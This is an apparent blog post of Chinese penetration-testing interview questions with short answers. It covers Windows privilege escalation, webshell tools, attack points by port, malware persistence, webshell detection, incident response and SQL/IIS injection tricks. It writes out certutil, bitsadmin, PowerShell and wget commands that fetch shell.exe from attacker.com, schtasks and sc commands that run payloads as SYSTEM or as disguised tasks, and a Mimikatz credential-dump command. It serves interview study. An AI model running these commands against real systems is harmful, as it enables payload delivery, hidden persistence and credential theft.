2025年渗透测试面试题总结-拷打题库04(题目+回答)

 网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

2025年渗透测试面试题总结-拷打题库04

一、Windows常见提权方法

二、蚁剑/菜刀/C刀/冰蝎对比

三、Windows下载文件命令

四、常见端口与攻击点

五、木马驻留系统方式

六、常用威胁情报平台

七、Webshell检测工具

八、高频利用漏洞

九、Windows常用命令

十、应急响应基本思路

十一、Linux常用命令

十二、蓝队反制手段

十三、公司认知与职位动机

十四、职业规划与能力证明

十五、技术细节问题

GPC绕过

Mysql变量区别

IIS解析漏洞

Wireshark与NAT

十六、计划任务隐藏

十七、最难漏洞挖掘案例

2025年渗透测试面试题总结-拷打题库04

windows 常见的提权方法有哪些?
蚁剑/菜刀/C 刀/冰蝎的相同与不相同之处
windows 环境下有哪些下载文件的命令?
常见的端口号?攻击点?
木马驻留系统的方式有哪些?
常用的威胁情报平台有哪些?
常用的 webshell 检测工具有哪些?
一般情况下。那些漏洞会被高频被用于打点?
windows 常用的命令?
应急响应的基本思路是什么?
Linux 常用的命令?
蓝队常用的反制手段有哪些?
对我们公司有什么了解,为什么选择本公司
为什么想要应聘这个职位
对安全服务是怎么理解的
如果我不知道渗透测试,两分钟说一下
如果我是一个汽车厂商,你如何证明你的工作是有意义的?
作为应届生,你如何能胜任该职位
你有什么职业规划
如果离职的话是因为什么原因
给不了这么多工资可以接受吗?为什么想要这个数?
对上司有什么要求?喜欢和什么样的领导合作?
SQL的存储引擎
SQL注入写shell的条件,用法
GPC是什么?开启了怎么绕过
Mysql一个@和两个@什么区别
IIS解析漏洞,不同版本有什么漏洞,还有什么容器解析漏洞
wireshark抓包,数据报经过三层交换机、路由的变化,NAT协议描述,地址进入内网怎么变化
linux计划任务,黑客隐藏自己的计划任务会怎么做。windows计划任务怎么设定
挖过最难的漏洞是什么

一、Windows常见提权方法

  1. 漏洞利用
    • 使用未修复的系统漏洞(如MS17-010永恒之蓝、PrintNightmare)。
    • 工具:JuicyPotato(滥用COM组件)、RoguePotato(提权至SYSTEM)。
  2. 服务权限滥用
    • 查找弱权限服务(accesschk.exe 检查权限),通过修改服务路径注入恶意代码。
  3. 令牌窃取
    • 使用Mimikatz抓取内存中的管理员令牌(sekurlsa::logonpasswords)。
  4. 计划任务劫持
    • 创建高权限任务(schtasks /create /tn "test" /tr "C:\shell.exe" /sc onstart /ru SYSTEM)。
  5. AlwaysInstallElevated
    • 利用组策略允许普通用户安装MSI包(注册表键值HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer)。

二、蚁剑/菜刀/C刀/冰蝎对比

工具相同点不同点
蚁剑支持Webshell管理模块化插件、支持多协议(HTTP/Socks5)。
菜刀基础文件管理无加密传输、仅支持PHP/ASP。
C刀轻量级Webshell连接支持内存加载、绕过部分杀软。
冰蝎动态加密通信(AES)流量混淆、支持TCP/UDP隧道。

三、Windows下载文件命令

  1. certutil
    bashcertutil -urlcache -split -f http://attacker.com/shell.exe C:\shell.exe 
  2. bitsadmin
    bashbitsadmin /transfer job /download /priority normal http://attacker.com/shell.exe C:\shell.exe 
  3. PowerShell
    powershellInvoke-WebRequest -Uri http://attacker.com/shell.exe -OutFile C:\shell.exe 
  4. wget(需安装):
    bashwget http://attacker.com/shell.exe -O C:\shell.exe 

四、常见端口与攻击点

端口服务攻击点
80/443HTTP/HTTPSSQL注入、XSS、Webshell上传。
445SMB永恒之蓝漏洞(MS17-010)、共享爆破。
3389RDP弱口令爆破、CVE-2019-0708(BlueKeep)。
3306MySQL弱口令登录、SQL注入写Shell。
22SSH密钥泄露、暴力破解。

五、木马驻留系统方式

  1. 注册表启动项
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  2. 服务创建
    • sc create "UpdateService" binPath="C:\malware.exe" start=auto
  3. 计划任务
    • 创建定时任务执行恶意程序。
  4. DLL劫持
    • 替换系统程序依赖的DLL文件。
  5. WMI事件订阅
    • 利用WMI永久事件触发恶意代码。

六、常用威胁情报平台

  1. VirusTotal:文件/URL/IP威胁检测。
  2. AlienVault OTX:开源威胁情报共享。
  3. 微步在线:国内APT攻击情报分析。
  4. IBM X-Force:漏洞与恶意IP数据库。

七、Webshell检测工具

  1. D盾:查杀PHP/ASP/ASPX木马。
  2. 河马WebShell检测:静态特征+行为分析。
  3. CloudWalker(牧云):实时监控文件变动。
  4. ClamAV:开源病毒扫描引擎。

八、高频利用漏洞

  1. SQL注入:直接获取数据库权限。
  2. RCE(远程代码执行):如Log4j2、Fastjson反序列化。
  3. 文件上传漏洞:上传Webshell控制服务器。
  4. SSRF(服务端请求伪造):探测内网或攻击本地服务。

九、Windows常用命令

  1. 系统信息
    • systeminfo:查看系统版本和补丁。
    • netstat -ano:检查开放端口和进程。
  2. 用户管理
    • net user:查看/创建用户。
    • whoami /priv:检查当前权限。
  3. 网络操作
    • ipconfig /all:查看网络配置。
    • arp -a:显示ARP缓存表。

十、应急响应基本思路

  1. 准备阶段:制定预案、工具包(如取证工具)。
  2. 检测与抑制:隔离受感染主机、分析日志(EventLog/Web日志)。
  3. 根除与恢复:清除恶意文件、修复漏洞。
  4. 复盘总结:输出事件报告、优化防御策略。

十一、Linux常用命令

  1. 文件操作
    • ls -al:查看隐藏文件。
    • find / -perm -4000:查找SUID文件。
  2. 网络排查
    • netstat -tulnp:查看监听端口。
    • tcpdump -i eth0 port 80:抓包分析。
  3. 进程管理
    • ps aux:查看所有进程。
    • kill -9 PID:强制终止进程。

十二、蓝队反制手段

  1. 蜜罐诱捕:部署伪装服务(如Honeypot)。
  2. 流量分析:使用Wireshark/Zeek检测异常流量。
  3. 溯源反制:通过攻击IP反向渗透(需法律授权)。
  4. 日志留存:集中管理日志(如ELK Stack)快速检索。

十三、公司认知与职位动机

  1. 公司了解
    • 提及公司核心业务(如安全服务、APT追踪)。
    • 举例公司产品(如威胁检测平台)。
  2. 职位选择
    • 强调个人技能匹配(如渗透测试经验)。
    • 表达对安全行业的长期热情。

十四、职业规划与能力证明

  1. 职业规划
    • 短期:精通渗透测试与漏洞挖掘。
    • 长期:成为安全架构师或攻防团队负责人。
  2. 能力证明
    • 举例过往项目(如某次渗透测试成功案例)。
    • 强调学习能力(如自学逆向工程)。

十五、技术细节问题

GPC绕过
  • 原理magic_quotes_gpc开启时转义单引号等字符。
  • 绕过:使用宽字节注入(如%bf%27)、数字型注入。
Mysql变量区别
  • @var:用户自定义变量。
  • @@var:系统变量(如@@version)。
IIS解析漏洞
  • IIS6.0:分号截断(test.asp;.jpg 解析为ASP)。
  • 其他容器:Nginx解析漏洞(如test.jpg/.php )。
Wireshark与NAT
  • NAT转换:源IP从内网地址(如192.168.1.1)转为公网IP。
  • 数据包变化:三层交换基于MAC,路由基于IP,NAT修改IP头部。

十六、计划任务隐藏

  1. Linux
    • /etc/cron.d/中创建隐藏文件(如.malware)。
  2. Windows
    • 使用schtasks /create /tn "Microsoft\Windows\Update"伪装系统任务。

十七、最难漏洞挖掘案例

  • 案例:某CMS的二次注入漏洞(需构造多步请求触发)。
  • 技术点:通过代码审计发现过滤逻辑缺陷,利用时间盲注获取数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值